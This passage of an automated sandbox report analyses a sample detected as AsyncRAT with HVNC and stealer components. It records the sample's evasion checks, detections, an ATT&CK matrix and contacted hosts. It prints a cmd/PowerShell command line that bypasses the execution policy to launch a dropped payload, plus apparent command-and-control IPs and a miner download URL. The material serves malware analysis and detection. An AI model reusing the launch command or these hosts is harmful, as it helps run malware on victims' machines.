                    Source: C:\Users\user\Desktop\AsyncClient.exe TID: 7108Thread sleep count: 8691 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exe TID: 7108Thread sleep count: 1154 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4268Thread sleep count: 3680 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4280Thread sleep count: 635 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4788Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4932Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exe TID: 3364Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 636Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 2656Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exe TID: 2940Thread sleep count: 886 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exe TID: 2940Thread sleep time: -886000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exe TID: 1920Thread sleep count: 360 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exe TID: 1920Thread sleep time: -36000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exe TID: 2940Thread sleep count: 8228 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exe TID: 2940Thread sleep time: -8228000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\AsyncClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: AsyncClient.exe, 00000000.00000002.3888273667.0000000004E92000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Vo:-
                    Source: AsyncClient.exeBinary or memory string: vmware
                    Source: AsyncClient.exe, 00000000.00000002.3888734678.0000000004EDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: AsyncClient.exe, 00000000.00000002.3888273667.0000000004E30000.00000004.00000020.00020000.00000000.sdmp, AsyncClient.exe, 00000000.00000002.3888789475.0000000004EEF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3231908731.00000232E7454000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3231332635.00000232E1E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: AsyncClient.exe, 00000000.00000002.3888734678.0000000004EDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}w
                    Source: hklugq.exe, 0000000B.00000002.3882871020.0000000001097000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeCode function: 5_2_07326F60 rdtsc 5_2_07326F60
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell download and execute
                    Source: Yara matchFile source: Process Memory Space: hklugq.exe PID: 3800, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: hklugq.exe PID: 4268, type: MEMORYSTR
                    Bypasses PowerShell execution policy
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\hklugq.exe"'
                    Source: C:\Users\user\Desktop\AsyncClient.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\hklugq.exe"' & exitJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\hklugq.exe"' Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\hklugq.exe "C:\Users\user\AppData\Local\Temp\hklugq.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeProcess created: C:\Users\user\AppData\Local\Temp\hklugq.exe "C:\Users\user\AppData\Local\Temp\hklugq.exe"Jump to behavior
                    Source: AsyncClient.exe, 00000000.00000002.3883921677.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, AsyncClient.exe, 00000000.00000002.3883921677.0000000002ACD000.00000004.00000800.00020000.00000000.sdmp, AsyncClient.exe, 00000000.00000002.3883921677.0000000002A75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: AsyncClient.exe, 00000000.00000002.3883921677.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, AsyncClient.exe, 00000000.00000002.3883921677.0000000002ACD000.00000004.00000800.00020000.00000000.sdmp, AsyncClient.exe, 00000000.00000002.3883921677.0000000002A75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe
                    Source: hklugq.exe, 00000005.00000002.1648992753.0000000003D93000.00000004.00000800.00020000.00000000.sdmp, hklugq.exe, 0000000B.00000002.3882310558.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd1000
                    Source: AsyncClient.exe, 00000000.00000002.3883921677.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, AsyncClient.exe, 00000000.00000002.3883921677.0000000002ACD000.00000004.00000800.00020000.00000000.sdmp, AsyncClient.exe, 00000000.00000002.3883921677.0000000002A75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\
                    Source: C:\Users\user\Desktop\AsyncClient.exeQueries volume information: C:\Users\user\Desktop\AsyncClient.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeQueries volume information: C:\Users\user\AppData\Local\Temp\hklugq.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeQueries volume information: C:\Users\user\AppData\Local\Temp\hklugq.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\hklugq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\AsyncClient.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Yara detected AsyncRAT
                    Source: Yara matchFile source: AsyncClient.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.AsyncClient.exe.630000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.1429164611.0000000000632000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.3883921677.0000000002951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: AsyncClient.exe PID: 4300, type: MEMORYSTR
                    Source: AsyncClient.exe, 00000000.00000002.3882545170.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp, AsyncClient.exe, 00000000.00000002.3888273667.0000000004E5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\AsyncClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected HVNC
                    Source: Yara matchFile source: 11.2.hklugq.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.hklugq.exe.3d93990.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.hklugq.exe.3d93990.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.3882310558.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1648992753.0000000003D93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: hklugq.exe PID: 3800, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: hklugq.exe PID: 4268, type: MEMORYSTR
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.AsyncClient.exe.3ae89a8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.AsyncClient.exe.69c0000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.AsyncClient.exe.3ae89a8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.AsyncClient.exe.69c0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.3890281185.00000000069C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.3887100642.0000000003957000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 11.2.hklugq.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.hklugq.exe.3d93990.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.hklugq.exe.3d93990.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.3882310558.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1648992753.0000000003D93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: hklugq.exe PID: 3800, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: hklugq.exe PID: 4268, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected HVNC
                    Source: Yara matchFile source: 11.2.hklugq.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.hklugq.exe.3d93990.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.hklugq.exe.3d93990.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.3882310558.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1648992753.0000000003D93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: hklugq.exe PID: 3800, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: hklugq.exe PID: 4268, type: MEMORYSTR
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.AsyncClient.exe.3ae89a8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.AsyncClient.exe.69c0000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.AsyncClient.exe.3ae89a8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.AsyncClient.exe.69c0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.3890281185.00000000069C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.3887100642.0000000003957000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		OS Credential Dumping1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		12
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		LSASS Memory23
                    System Information Discovery                    		Remote Desktop ProtocolData from Removable Media1
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts2
                    PowerShell                    		Logon Script (Windows)1
                    Scheduled Task/Job                    		211
                    Obfuscated Files or Information                    		Security Account Manager1
                    Query Registry                    		SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    Software Packing                    		NTDS241
                    Security Software Discovery                    		Distributed Component Object ModelInput Capture2
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Timestomp                    		LSA Secrets2
                    Process Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials41
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                    Masquerading                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Modify Registry                    		Proc Filesystem1
                    System Network Configuration Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt41
                    Virtualization/Sandbox Evasion                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                    Process Injection                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1574525 Sample: AsyncClient.exe Startdate: 13/12/2024 Architecture: WINDOWS Score: 100 38 google.com 2->38 40 checkip.dyndns.org 2->40 42 2 other IPs or domains 2->42 54 Suricata IDS alerts for network traffic 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 15 other signatures 2->60 11 AsyncClient.exe 1 4 2->11         started        15 svchost.exe 1 1 2->15         started        17 explorer.exe 5 4 2->17         started        signatures3 process4 dnsIp5 44 82.64.156.123, 49704, 49706, 80 PROXADFR France 11->44 36 C:\Users\user\AppData\Local\Temp\hklugq.exe, PE32 11->36 dropped 19 cmd.exe 1 11->19         started        46 127.0.0.1 unknown unknown 15->46 file6 process7 signatures8 62 Suspicious powershell command line found 19->62 64 Bypasses PowerShell execution policy 19->64 22 powershell.exe 12 19->22         started        24 conhost.exe 19->24         started        process9 process10 26 hklugq.exe 5 22->26         started        signatures11 66 Antivirus detection for dropped file 26->66 68 Multi AV Scanner detection for dropped file 26->68 70 Machine Learning detection for dropped file 26->70 29 hklugq.exe 15 4 26->29         started        32 explorer.exe 26->32         started        process12 dnsIp13 48 checkip.dyndns.com 193.122.130.0, 49716, 80 ORACLE-BMC-31898US United States 29->48 50 google.com 172.217.17.78 GOOGLEUS United States 29->50 52 83.147.52.247, 49715, 80 CUBENODEES Spain 29->52 34 conhost.exe 29->34         started        process14

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    AsyncClient.exe87%ReversingLabsByteCode-MSIL.Backdoor.AsyncRat
                    AsyncClient.exe100%AviraTR/Dropper.Gen
                    AsyncClient.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\hklugq.exe100%AviraTR/Dropper.Gen
                    C:\Users\user\AppData\Local\Temp\hklugq.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\hklugq.exe75%ReversingLabsByteCode-MSIL.Trojan.Rozena

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    No Antivirus matches

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    bg.microsoft.map.fastly.net
                    		199.232.210.172
                    		truefalse
                      		high
                      google.com
                      		172.217.17.78
                      		truefalse
                        		high
                        checkip.dyndns.com
                        		193.122.130.0
                        		truefalse
                          		high
                          checkip.dyndns.org
                          		unknown
                          		unknownfalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://checkip.dyndns.org/false
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://g.live.com/odclientsettings/Prod/C:edb.log.6.drfalse
                                		high
                                http://checkip.dyndns.comdhklugq.exe, 0000000B.00000002.3883941364.0000000002EB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://checkip.dyndns.org/thklugq.exe, 0000000B.00000002.3883941364.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://i.imgur.com/A6jEbUB.pnghklugq.exe, 0000000B.00000002.3882310558.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                      		high
                                      http://checkip.dyndns.orgdhklugq.exe, 0000000B.00000002.3883941364.0000000002EB9000.00000004.00000800.00020000.00000000.sdmp, hklugq.exe, 0000000B.00000002.3883941364.0000000002E8D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://crl.ver)svchost.exe, 00000006.00000002.3231773867.00000232E7400000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://g.live.com/odclientsettings/ProdV2/C:svchost.exe, 00000006.00000003.1590978651.00000232E7250000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drfalse
                                            		high
                                            http://checkip.dyndns.orghklugq.exe, 00000005.00000002.1648992753.0000000003D93000.00000004.00000800.00020000.00000000.sdmp, hklugq.exe, 0000000B.00000002.3883941364.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp, hklugq.exe, 0000000B.00000002.3883941364.0000000002EB9000.00000004.00000800.00020000.00000000.sdmp, hklugq.exe, 0000000B.00000002.3882310558.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hklugq.exe, 0000000B.00000002.3883941364.0000000002E8D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://checkip.dyndns.comhklugq.exe, 0000000B.00000002.3883941364.0000000002EB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://checkip.dyndns.org/4vhklugq.exe, 0000000B.00000002.3883941364.0000000002E8D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameAsyncClient.exe, 00000000.00000002.3883921677.0000000002951000.00000004.00000800.00020000.00000000.sdmp, hklugq.exe, 0000000B.00000002.3883941364.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://cdn.discordapp.com/attachments/859410781241475093/907881277804400691/ETHMiner.exe0hklugq.exe, 0000000B.00000002.3883941364.0000000002E31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
